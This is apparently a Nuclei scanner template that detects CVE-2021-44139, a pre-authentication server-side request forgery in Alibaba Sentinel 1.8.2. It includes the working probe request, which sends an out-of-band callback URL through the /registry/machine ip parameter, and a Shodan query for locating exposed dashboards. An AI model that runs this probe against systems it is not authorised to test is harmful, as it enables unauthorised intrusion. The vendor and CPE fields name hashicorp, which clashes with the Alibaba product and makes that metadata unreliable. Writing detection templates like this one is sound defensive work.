id: CVE-2021-44139 info: name: Alibaba Sentinel - Server-side request forgery (SSRF) author: DhiyaneshDK severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. remediation: | Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: - https://github.com/alibaba/Sentinel/issues/2451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.01329 epss-percentile: 0.84536 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hashicorp product: sentinel shodan-query: title:"Sentinel Dashboard" tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel http: - method: GET path: - "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0" matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: header words: - application/json - type: word part: body words: - '"success":true' - '"msg":"success"' condition: and # digest: 4a0a0047304502202658b274771536459a466a0b2833e01f79c13ebd6a6b86d9e304530332002fac022100a44a5ddf31709db650edc29dc5287d2541eb094b4d49a60c8f2bb0a713f7db0c:922c64590222798bb761d5b6d8e72950